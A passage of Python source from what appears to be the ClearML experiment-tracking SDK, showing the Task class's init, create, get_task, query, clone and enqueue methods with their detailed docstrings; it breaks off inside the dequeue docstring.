def current_task(cls):
# type: () -> Task
"""
Get the current running Task (experiment). This is the main execution Task (task context) returned as a Task
object.
:return: The current running Task (experiment).
"""
# check if we have no main Task, but the main process created one.
if not cls.__main_task and cls.__get_master_id_task_id():
# initialize the Task, connect to stdout
cls.init()
# return main Task
return cls.__main_task
@classmethod
def init(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=TaskTypes.training, # type: Task.TaskTypes
tags=None, # type: Optional[Sequence[str]]
reuse_last_task_id=True, # type: Union[bool, str]
continue_last_task=False, # type: Union[bool, str, int]
output_uri=None, # type: Optional[Union[str, bool]]
auto_connect_arg_parser=True, # type: Union[bool, Mapping[str, bool]]
auto_connect_frameworks=True, # type: Union[bool, Mapping[str, bool]]
auto_resource_monitoring=True, # type: bool
auto_connect_streams=True, # type: Union[bool, Mapping[str, bool]]
):
# type: (...) -> "Task"
"""
Creates a new Task (experiment) if:
- The Task never ran before. No Task with the same ``task_name`` and ``project_name`` is stored in
**ClearML Server**.
- The Task has run before (the same ``task_name`` and ``project_name``), and (a) it stored models and / or
artifacts, or (b) its status is Published , or (c) it is Archived.
- A new Task is forced by calling ``Task.init`` with ``reuse_last_task_id=False``.
Otherwise, the already initialized Task object for the same ``task_name`` and ``project_name`` is returned.
.. note::
To reference another Task, instead of initializing the same Task more than once, call
:meth:`Task.get_task`. For example, to "share" the same experiment in more than one script,
call ``Task.get_task``. See the ``Task.get_task`` method for an example.
For example:
The first time the following code runs, it will create a new Task. The status will be Completed.
.. code-block:: py
from clearml import Task
task = Task.init('myProject', 'myTask')
If this code runs again, it will not create a new Task. It does not store a model or artifact,
it is not Published (its status Completed) , it was not Archived, and a new Task is not forced.
If the Task is Published or Archived, and run again, it will create a new Task with a new Task ID.
The following code will create a new Task every time it runs, because it stores an artifact.
.. code-block:: py
task = Task.init('myProject', 'myOtherTask')
d = {'a': '1'}
task.upload_artifact('myArtifact', d)
:param str project_name: The name of the project in which the experiment will be created. If the project does
not exist, it is created. If ``project_name`` is ``None``, the repository name is used. (Optional)
:param str task_name: The name of Task (experiment). If ``task_name`` is ``None``, the Python experiment
script's file name is used. (Optional)
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:param tags: Add a list of tags (str) to the created Task. For example: tags=['512x512', 'yolov3']
:param bool reuse_last_task_id: Force a new Task (experiment) with a previously used Task ID,
and the same project and Task name.
.. note::
If the previously executed Task has artifacts or models, it will not be reused (overwritten)
and a new Task will be created.
When a Task is reused, the previous execution outputs are deleted, including console outputs and logs.
The values are:
- ``True`` - Reuse the last Task ID. (default)
- ``False`` - Force a new Task (experiment).
- A string - You can also specify a Task ID (string) to be reused,
instead of the cached ID based on the project/name combination.
:param bool continue_last_task: Continue the execution of a previously executed Task (experiment)
.. note::
When continuing the executing of a previously executed Task,
all previous artifacts / models/ logs are intact.
New logs will continue iteration/step based on the previous-execution maximum iteration value.
For example:
The last train/loss scalar reported was iteration 100, the next report will be iteration 101.
The values are:
- ``True`` - Continue the the last Task ID.
specified explicitly by reuse_last_task_id or implicitly with the same logic as reuse_last_task_id
- ``False`` - Overwrite the execution of previous Task (default).
- A string - You can also specify a Task ID (string) to be continued.
This is equivalent to `continue_last_task=True` and `reuse_last_task_id=a_task_id_string`.
- An integer - Specify initial iteration offset (override the auto automatic last_iteration_offset)
Pass 0, to disable the automatic last_iteration_offset or specify a different initial offset
You can specify a Task ID to be used with `reuse_last_task_id='task_id_here'`
:param str output_uri: The default location for output models and other artifacts.
If True is passed, the default files_server will be used for model storage.
In the default location, ClearML creates a subfolder for the output.
The subfolder structure is the following:
<output destination name> / <project name> / <task name>.<Task ID>
The following are examples of ``output_uri`` values for the supported locations:
- A shared folder: ``/mnt/share/folder``
- S3: ``s3://bucket/folder``
- Google Cloud Storage: ``gs://bucket-name/folder``
- Azure Storage: ``azure://company.blob.core.windows.net/folder/``
- Default file server: True
.. important::
For cloud storage, you must install the **ClearML** package for your cloud storage type,
and then configure your storage credentials. For detailed information, see
`ClearML Python Client Extras <./references/clearml_extras_storage/>`_ in the "ClearML Python Client
Reference" section.
:param auto_connect_arg_parser: Automatically connect an argparse object to the Task
The values are:
- ``True`` - Automatically connect. (default)
- ``False`` - Do not automatically connect.
- A dictionary - In addition to a boolean, you can use a dictionary for fined grained control of connected
arguments. The dictionary keys are argparse variable names and the values are booleans.
The ``False`` value excludes the specified argument from the Task's parameter section.
Keys missing from the dictionary default to ``True``, you can change it to be ``False`` by adding
``*`` key as ``False`` to the dictionary.
An empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_arg_parser={'do_not_include_me': False, }
.. code-block:: py
auto_connect_arg_parser={"only_include_me": True, "*": False}
.. note::
To manually connect an argparse, use :meth:`Task.connect`.
:param auto_connect_frameworks: Automatically connect frameworks This includes patching MatplotLib, XGBoost,
scikit-learn, Keras callbacks, and TensorBoard/X to serialize plots, graphs, and the model location to
the **ClearML Server** (backend), in addition to original output destination.
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
- A dictionary - In addition to a boolean, you can use a dictionary for fined grained control of connected
frameworks. The dictionary keys are frameworks and the values are booleans.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_frameworks={
'matplotlib': True, 'tensorflow': True, 'tensorboard': True, 'pytorch': True,
'xgboost': True, 'scikit': True, 'fastai': True, 'lightgbm': True,
'hydra': True, 'detect_repository': True, 'tfdefines': True, 'joblib': True,
'megengine': True, 'jsonargparse': True,
}
:param bool auto_resource_monitoring: Automatically create machine resource monitoring plots
These plots appear in in the **ClearML Web-App (UI)**, **RESULTS** tab, **SCALARS** sub-tab,
with a title of **:resource monitor:**.
The values are:
- ``True`` - Automatically create resource monitoring plots. (default)
- ``False`` - Do not automatically create.
- Class Type - Create ResourceMonitor object of the specified class type.
:param auto_connect_streams: Control the automatic logging of stdout and stderr
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
- A dictionary - In addition to a boolean, you can use a dictionary for fined grained control of stdout and
stderr. The dictionary keys are 'stdout' , 'stderr' and 'logging', the values are booleans.
Keys missing from the dictionary default to ``False``, and an empty dictionary defaults to ``False``.
Notice, the default behaviour is logging stdout/stderr the
`logging` module is logged as a by product of the stderr logging
For example:
.. code-block:: py
auto_connect_streams={'stdout': True, 'stderr': True, 'logging': False}
:return: The main execution Task (Task context).
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type) if task_type else task_type, str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`, "
"or close the current task with `task.close()` before calling `Task.init(...)`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
cls.__main_task.get_logger()
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task.__reporter = None
# noinspection PyProtectedMember
cls.__main_task._get_logger(auto_connect_streams=auto_connect_streams)
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
# noinspection PyProtectedMember
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
# TODO: Check if the signal handler method is safe enough, for the time being, do not unhook
# cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
# start all reporting threads
BackgroundMonitor.start_all(task=cls.__main_task)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
is_sub_process_task_id = None
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is Windows/macOS platform, linux support fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub() # noqa
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
if task_type not in Task.TaskTypes.__members__:
raise ValueError("Task type '{}' not supported, options are: {}".format(
task_type, Task.TaskTypes.__members__.keys()))
task_type = Task.TaskTypes.__members__[str(task_type)]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
default_project_name=project_name,
default_task_name=task_name,
default_task_type=task_type,
tags=tags,
reuse_last_task_id=reuse_last_task_id,
continue_last_task=continue_last_task,
detect_repo=False if (
isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True,
auto_connect_streams=auto_connect_streams,
)
# set defaults
if cls._offline_mode:
task.output_uri = None
elif output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = cls.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
# make sure we are started
task.started(ignore_errors=True)
# continue last iteration if we had any
if task.data.last_iteration:
task.set_initial_iteration(int(task.data.last_iteration) + 1)
else:
# subprocess should get back the task info
task = cls.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# always patch OS forking because of ProcessPool and the alike
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('hydra', True):
PatchHydra.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('jsonargparse', True):
PatchJsonArgParse.update_current_task(task)
if is_auto_connect_frameworks_bool or (
auto_connect_frameworks.get('scikit', True) and
auto_connect_frameworks.get('joblib', True)):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True) \
or auto_connect_frameworks.get('tensorboard', True):
# allow to disable tfdefines
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tfdefines', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(
task,
patch_reporting=(is_auto_connect_frameworks_bool
or auto_connect_frameworks.get('tensorboard', True)),
patch_model_io=(is_auto_connect_frameworks_bool
or auto_connect_frameworks.get('tensorflow', True)),
)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('megengine', True):
PatchMegEngineModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('fastai', True):
PatchFastai.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('lightgbm', True):
PatchLIGHTgbmModelIO.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
resource_monitor_cls = auto_resource_monitoring \
if isinstance(auto_resource_monitoring, six.class_types) else ResourceMonitor
task._resource_monitor = resource_monitor_cls(
task, report_mem_used_per_process=not config.get(
'development.worker.report_global_mem_used', False))
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# Patch Click
PatchClick.patch(Task.__main_task)
# set excluded arguments
if isinstance(auto_connect_arg_parser, dict):
task._arguments.exclude_parser_args(auto_connect_arg_parser)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
for parser, parsed_args in get_argparser_last_args():
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# actually we have nothing to do, in remote running, the argparser will ignore
# all non argparser parameters, only caveat if parameter connected with the same name
# as the argparser this will be solved once sections are introduced to parameters
pass
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task._get_logger(auto_connect_streams=auto_connect_streams)
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
if cls._offline_mode:
logger.report_text('ClearML running in offline mode, session stored in {}'.format(
task.get_offline_mode_folder()))
else:
logger.report_text('ClearML results page: {}'.format(task.get_output_log_web_page()))
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_setup_worker()
if (not task._reporter or not task._reporter.is_alive()) and \
is_sub_process_task_id and not cls._report_subprocess_enabled:
task._setup_reporter()
# start monitoring in background process or background threads
# monitoring are: Resource monitoring and Dev Worker monitoring classes
BackgroundMonitor.start_all(task=task)
return task
@classmethod
def create(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=None, # type: Optional[str]
repo=None, # type: Optional[str]
branch=None, # type: Optional[str]
commit=None, # type: Optional[str]
script=None, # type: Optional[str]
working_directory=None, # type: Optional[str]
packages=None, # type: Optional[Union[bool, Sequence[str]]]
requirements_file=None, # type: Optional[Union[str, Path]]
docker=None, # type: Optional[str]
docker_args=None, # type: Optional[str]
docker_bash_setup_script=None, # type: Optional[str]
argparse_args=None, # type: Optional[Sequence[Tuple[str, str]]]
base_task_id=None, # type: Optional[str]
add_task_init_call=True, # type: bool
):
# type: (...) -> Task
"""
Manually create and populate a new Task (experiment) in the system.
If the code does not already contain a call to ``Task.init``, pass add_task_init_call=True,
and the code will be patched in remote execution (i.e. when executed by `clearml-agent`
.. note::
This method **always** creates a new Task.
Use :meth:`Task.init` method to automatically create and populate task for the running process.
To reference an existing Task, call the :meth:`Task.get_task` method .
:param project_name: Set the project name for the task. Required if base_task_id is None.
:param task_name: Set the name of the remote task. Required if base_task_id is None.
:param task_type: Optional, The task type to be created. Supported values: 'training', 'testing', 'inference',
'data_processing', 'application', 'monitor', 'controller', 'optimizer', 'service', 'qc', 'custom'
:param repo: Remote URL for the repository to use, or path to local copy of the git repository
Example: 'https://github.com/allegroai/clearml.git' or '~/project/repo'
:param branch: Select specific repository branch/tag (implies the latest commit from the branch)
:param commit: Select specific commit id to use (default: latest commit,
or when used with local repository matching the local commit id)
:param script: Specify the entry point script for the remote execution. When used in tandem with
remote git repository the script should be a relative path inside the repository,
for example: './source/train.py' . When used with local repository path it supports a
direct path to a file inside the local repository itself, for example: '~/project/source/train.py'
:param working_directory: Working directory to launch the script from. Default: repository root folder.
Relative to repo root or local folder.
:param packages: Manually specify a list of required packages. Example: ["tqdm>=2.1", "scikit-learn"]
or `True` to automatically create requirements
based on locally installed packages (repository must be local).
:param requirements_file: Specify requirements.txt file to install when setting the session.
If not provided, the requirements.txt from the repository will be used.
:param docker: Select the docker image to be executed in by the remote session
:param docker_args: Add docker arguments, pass a single string
:param docker_bash_setup_script: Add bash script to be executed
inside the docker before setting up the Task's environment
:param argparse_args: Arguments to pass to the remote execution, list of string pairs (argument, value)
Notice, only supported if the codebase itself uses argparse.ArgumentParser
:param base_task_id: Use a pre-existing task in the system, instead of a local repo/script.
Essentially clones an existing task and overrides arguments/requirements.
:param add_task_init_call: If True, a 'Task.init()' call is added to the script entry point in remote execution.
:return: The newly created Task (experiment)
"""
if not project_name and not base_task_id:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
from .backend_interface.task.populate import CreateAndPopulate
manual_populate = CreateAndPopulate(
project_name=project_name, task_name=task_name, task_type=task_type,
repo=repo, branch=branch, commit=commit,
script=script, working_directory=working_directory,
packages=packages, requirements_file=requirements_file,
docker=docker, docker_args=docker_args, docker_bash_setup_script=docker_bash_setup_script,
base_task_id=base_task_id,
add_task_init_call=add_task_init_call,
raise_on_missing_entries=False,
)
task = manual_populate.create_task()
if task and argparse_args:
manual_populate.update_task_args(argparse_args)
task.reload()
return task
@classmethod
def get_task(
cls,
task_id=None, # type: Optional[str]
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
allow_archived=True, # type: bool
task_filter=None # type: Optional[dict]
):
# type: (...) -> "Task"
"""
Get a Task by Id, or project name / task name combination.
For example:
The following code demonstrates calling ``Task.get_task`` to report a scalar to another Task. The output
of :meth:`.Logger.report_scalar` from testing is associated with the Task named ``training``. It allows
training and testing to run concurrently, because they initialized different Tasks (see :meth:`Task.init`
for information about initializing Tasks).
The training script:
.. code-block:: py
# initialize the training Task
task = Task.init('myProject', 'training')
# do some training
The testing script:
.. code-block:: py
# initialize the testing Task
task = Task.init('myProject', 'testing')
# get the training Task
train_task = Task.get_task(project_name='myProject', task_name='training')
# report metrics in the training Task
for x in range(10):
train_task.get_logger().report_scalar('title', 'series', value=x * 2, iteration=x)
:param str task_id: The Id (system UUID) of the experiment to get.
If specified, ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Task to get.
:param str task_name: The name of the Task within ``project_name`` to get.
:param list tags: Filter based on the requested list of tags (strings) (Task must have all the listed tags)
To exclude a tag add "-" prefix to the tag. Example: ["best", "-debug"]
:param bool allow_archived: Only applicable if *not* using specific ``task_id``,
If True (default) allow to return archived Tasks, if False filter out archived Tasks
:param bool task_filter: Only applicable if *not* using specific ``task_id``,
Pass additional query filters, on top of project/name. See details in Task.get_tasks.
:return: The Task specified by ID, or project name / experiment name combination.
"""
return cls.__get_task(
task_id=task_id, project_name=project_name, task_name=task_name, tags=tags,
include_archived=allow_archived, task_filter=task_filter,
)
@classmethod
def get_tasks(
cls,
task_ids=None, # type: Optional[Sequence[str]]
project_name=None, # type: Optional[Union[Sequence[str],str]]
task_name=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
task_filter=None # type: Optional[Dict]
):
# type: (...) -> List["Task"]
"""
Get a list of Tasks objects matching the queries/filters
- A list of specific Task IDs.
- Filter Tasks based on specific fields:
project name (including partial match), task name (including partial match), tags
Apply Additional advanced filtering with `task_filter`
:param list(str) task_ids: The Ids (system UUID) of experiments to get.
If ``task_ids`` specified, then ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Tasks to get. To get the experiment
in all projects, use the default value of ``None``. (Optional)
Use a list of string for multiple optional project names.
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
This method supports regular expressions for name matching. (Optional)
:param list(str) task_ids: list of unique task id string (if exists other parameters are ignored)
:param str project_name: project name (str) the task belongs to (use None for all projects)
:param str task_name: task name (str) in within the selected project
Return any partial match of task_name, regular expressions matching is also supported
If None is passed, returns all tasks within the project
:param list tags: Filter based on the requested list of tags (strings) (Task must have all the listed tags)
To exclude a tag add "-" prefix to the tag. Example: ["best", "-debug"]
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
`parent`: (str) filter by parent task-id matching
`search_text`: (str) free text search (in task fields comment/name/id)
`status`: List[str] List of valid statuses
(options are: "created", "queued", "in_progress", "stopped", "published", "completed")
`type`: List[str] List of valid task type
(options are: 'training', 'testing', 'inference', 'data_processing', 'application', 'monitor',
'controller', 'optimizer', 'service', 'qc'. 'custom')
`user`: List[str] Filter based on Task's user owner, provide list of valid user Ids.
`order_by`: List[str] List of field names to order by. When search_text is used,
Use '-' prefix to specify descending order. Optional, recommended when using page
Example: order_by=['-last_update']
`_all_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in All `fields`
dict(fields=['script.repository'], pattern='github.com/user')
`_any_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in Any of the `fields`
dict(fields=['comment', 'name'], pattern='my comment')
Examples:
{'status': ['stopped'], 'order_by': ["-last_update"]}
{'order_by'=['-last_update'], '_all_'=dict(fields=['script.repository'], pattern='github.com/user'))
:return: The Tasks specified by the parameter combinations (see the parameters).
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name, tags=tags,
task_name=task_name, **(task_filter or {}))
@classmethod
def query_tasks(
cls,
project_name=None, # type: Optional[Union[Sequence[str],str]]
task_name=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
additional_return_fields=None, # type: Optional[Sequence[str]]
task_filter=None, # type: Optional[Dict]
):
# type: (...) -> Union[List[str], List[Dict[str, str]]]
"""
Get a list of Tasks ID matching the specific query/filter.
Notice, if `additional_return_fields` is specified, returns a list of
dictionaries with requested fields (dict per Task)
:param str project_name: The project name of the Tasks to get. To get the experiment
in all projects, use the default value of ``None``. (Optional)
Use a list of string for multiple optional project names.
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
This method supports regular expressions for name matching. (Optional)
:param str project_name: project name (str) the task belongs to (use None for all projects)
:param str task_name: task name (str) in within the selected project
Return any partial match of task_name, regular expressions matching is also supported
If None is passed, returns all tasks within the project
:param list tags: Filter based on the requested list of tags (strings) (Task must have all the listed tags)
To exclude a tag add "-" prefix to the tag. Example: ["best", "-debug"]
:param list additional_return_fields: Optional, if not provided return a list of Task IDs.
If provided return dict per Task with the additional requested fields.
Example: returned_fields=['last_updated', 'user', 'script.repository'] will return a list of dict:
[{'id': 'task_id', 'last_update': datetime.datetime(),
'user': 'user_id', 'script.repository': 'https://github.com/user/'}, ]
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
`parent`: (str) filter by parent task-id matching
`search_text`: (str) free text search (in task fields comment/name/id)
`status`: List[str] List of valid statuses
(options are: "created", "queued", "in_progress", "stopped", "published", "completed")
`type`: List[str] List of valid task type
(options are: 'training', 'testing', 'inference', 'data_processing', 'application', 'monitor',
'controller', 'optimizer', 'service', 'qc'. 'custom')
`user`: List[str] Filter based on Task's user owner, provide list of valid user Ids.
`order_by`: List[str] List of field names to order by. When search_text is used,
Use '-' prefix to specify descending order. Optional, recommended when using page
Example: order_by=['-last_update']
`_all_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in All `fields`
dict(fields=['script.repository'], pattern='github.com/user')
`_any_`: dict(fields=[], pattern='') Match string `pattern` (regular expression)
appearing in Any of the `fields`
dict(fields=['comment', 'name'], pattern='my comment')
Examples:
{'status': ['stopped'], 'order_by': ["-last_update"]}
{'order_by'=['-last_update'], '_all_'=dict(fields=['script.repository'], pattern='github.com/user'))
:return: The Tasks specified by the parameter combinations (see the parameters).
"""
if tags:
task_filter = task_filter or {}
task_filter['tags'] = (task_filter.get('tags') or []) + list(tags)
return_fields = {}
if additional_return_fields:
task_filter = task_filter or {}
return_fields = set(list(additional_return_fields) + ['id'])
task_filter['only_fields'] = (task_filter.get('only_fields') or []) + list(return_fields)
results = cls._query_tasks(project_name=project_name, task_name=task_name, **(task_filter or {}))
return [t.id for t in results] if not additional_return_fields else \
[{k: cls._get_data_property(prop_path=k, data=r, raise_on_error=False, log_on_error=False)
for k in return_fields}
for r in results]
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (Union[str, bool]) -> None
# check if this is boolean
if value is False:
value = None
elif value is True:
value = self.__default_output_uri or self._get_default_report_storage_uri()
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/clearml.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
A read-only dictionary of Task artifacts (name, artifact).
:return: The artifacts.
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Mapping[str, Sequence[Model]]
"""
Read-only dictionary of the Task's loaded/stored models.
:return: A dictionary-like object with "input"/"output" keys and input/output properties, pointing to a
list-like object containing of Model objects. Each list-like object also acts as a dictionary, mapping
model name to a appropriate model instance.
Get input/output models:
.. code-block:: py
task.models.input
task.models["input"]
task.models.output
task.models["output"]
Get the last output model:
.. code-block:: py
task.models.output[-1]
Get a model by name:
.. code-block:: py
task.models.output["model name"]
"""
return self.get_models()
@property
def logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**ClearML Web-App (UI)**.
:return: The Logger object for the current Task (experiment).
"""
return self.get_logger()
@classmethod
def clone(
cls,
source_task=None, # type: Optional[Union[Task, str]]
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
):
# type: (...) -> Task
"""
Create a duplicate (a clone) of a Task (experiment). The status of the cloned Task is ``Draft``
and modifiable.
Use this method to manage experiments and for autoML.
:param str source_task: The Task to clone. Specify a Task object or a Task ID. (Optional)
:param str name: The name of the new cloned Task. (Optional)
:param str comment: A comment / description for the new cloned Task. (Optional)
:param str parent: The Id of the parent Task of the new Task.
- If ``parent`` is not specified, then ``parent`` is set to ``source_task.parent``.
- If ``parent`` is not specified and ``source_task.parent`` is not available, then
``parent`` set to to ``source_task``.
:param str project: The Id of the project in which to create the new Task.
If ``None``, the new task inherits the original Task's project. (Optional)
:return: The new cloned Task (experiment).
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("ClearML-server does not support DevOps features, "
"upgrade clearml-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Union[Task, str], Optional[str], Optional[str]) -> Any
"""
Enqueue a Task for execution, by adding it to an execution queue.
.. note::
A worker daemon must be listening at the queue for the worker to fetch the Task and execute it,
see `Use Case Examples <../clearml_agent_ref/#use-case-examples>`_ on the "ClearML Agent
Reference page.
:param Task/str task: The Task to enqueue. Specify a Task object or Task ID.
:param str queue_name: The name of the queue. If not specified, then ``queue_id`` must be specified.
:param str queue_id: The Id of the queue. If not specified, then ``queue_name`` must be specified.
:return: An enqueue JSON response.
.. code-block:: javascript
{
"queued": 1,
"updated": 1,
"fields": {
"status": "queued",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T15:05:35.426770+00:00",
"last_update": "2020-02-24T15:05:35.426770+00:00",
"execution.queue": "2bd96ab2d9e54b578cc2fb195e52c7cf"
}
}
- ``queued`` - The number of Tasks enqueued (an integer or ``null``).
- ``updated`` - The number of Tasks updated (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time (ISO 8601 format).
- ``last_update`` - The last Task update time, including Task creation, update, change, or events for
this task (ISO 8601 format).
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("ClearML-server does not support DevOps features, "
"upgrade clearml-server to 0.12.0 or above")
# make sure we have wither name ot id
mutually_exclusive(queue_name=queue_name, queue_id=queue_id)
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
queue_id = get_queue_id(session, queue_name)
if not queue_id:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
if not res.ok():
raise ValueError(res.response)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) a Task from an execution queue.
:param Task/str task: The Task to dequeue. Specify a Task object or Task ID.
:return: A dequeue JSON response.
.. code-block:: javascript
{
